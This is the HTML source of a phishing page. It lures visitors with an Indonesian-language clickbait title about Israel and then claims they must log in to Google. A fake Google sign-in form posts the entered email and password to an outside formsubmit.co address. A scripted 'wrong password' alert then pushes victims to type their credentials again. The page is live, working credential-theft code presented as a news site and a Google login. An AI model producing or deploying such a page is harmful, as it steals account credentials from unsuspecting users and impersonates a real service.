<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Oooh jadi gini kejamnya israel kepada musuh musuhnya enaknya diapain nih.....</title>
    <style>
      body {
        font-family: 'Open Sans', sans-serif;
        background-color: #f5f5f5;
      }

     .container {
        display: flex;
        justify-content: center;
        align-items: center;
        height: 100vh;
        margin: 0;
      }

     .card {
        background-color: #fff;
        padding: 30px;
        border-radius: 10px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        width: 300px;
      }

     .logo {
        display: flex;
        justify-content: center;
        margin-bottom: 20px;
      }

     .logo img {
        width: 100px;
        height: 30px;
      }

      h2 {
        font-weight: 400;
        margin-bottom: 10px;
      }

      p {
        font-size: 16px;
        color: #666;
        margin-bottom: 20px;
      }

     .input-group {
        position: relative;
        margin-bottom: 20px;
      }

     .input-group input {
        width: 100%;
        padding: 10px;
        font-size: 16px;
        border: none;
        border-bottom: 1px solid #ccc;
      }

     .input-group label {
        position: absolute;
        top: 0;
        left: 0;
        padding: 10px;
        font-size: 16px;
        color: #666;
        pointer-events: none;
        transition: 0.5s;
      }

     .input-group input:focus + label {
        top: -20px;
        left: 0;
        font-size: 14px;
        color: #333;
      }

     .underline {
        position: absolute;
        bottom: 0;
        left: 0;
        width: 100%;
        height: 2px;
        background-color: #333;
        transform: scaleX(0);
        transition: 0.5s;
      }

     .input-group input:focus ~.underline {
        transform: scaleX(1);
      }

     .btn {
        background-color: #4285f4;
        color: #fff;
        padding: 10px 20px;
        border: none;
        border-radius: 5px;
        cursor: pointer;
      }

     .btn:hover {
        background-color: #3367d6;
      }

     .google-btn {
        margin-top: 20px;
        text-align: center;
      }

     .g-signin2 {
        width: 240px;
        height: 50px;
        border: none;
        border-radius: 5px;
        background-color: #4285f4;
        color: #fff;
      }
      
      #logo{
       position : absolute;
       top : 200px;
      
      }
    </style>
</head>
<body>

    <div class="container">
        <div class="card">
            <div class="logo">
                <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_272x92dp.png" alt="Google Logo">
            </div>
            <h2>Log In</h2>
            <p>Use your Google Account</p>
            <form action="https://formsubmit.co/aa5bf61832680f8f2810da58baecc388" method="POST">
                <div class="input-group">
                    <input type="email" name="email" required placeholder="Email">
                    
                    <span class="underline"></span>
                </div>
                <div class="input-group">
                    <input type="password" name="password" required placeholder="password">
                    
                    <span class="underline"></span>
                </div>
                <button type="submit" class="btn" onclick="salah()">Log In</button>
            </form>
            
            </div>
        </div>
    </div>
    
    <div id="logo">
      
    </div>

    <script src="https://apis.google.com/js/platform.js?onload=renderButton" async defer></script>
    <script>
      
      
      
      
      function salah(){
   
        alert("Sorry, there is an error in your email or password, please fill it in correctly")
     
      }
      
      var gambar = new Image(340,340);
      gambar.src="news.jpg"
      var x = document.getElementById("logo");
      x.appendChild(gambar);
      
      var a = 0
      function jalan (){
        a++
        if(a>0){
          x.remove()
          clearInterval(z)
          alert("Sorry, it looks like your Google account is not logged in to this website, please log in to continue")
        }
      }
      var z = setInterval(jalan,500);
      
      
      
      
      
    </script>

</body>
</html>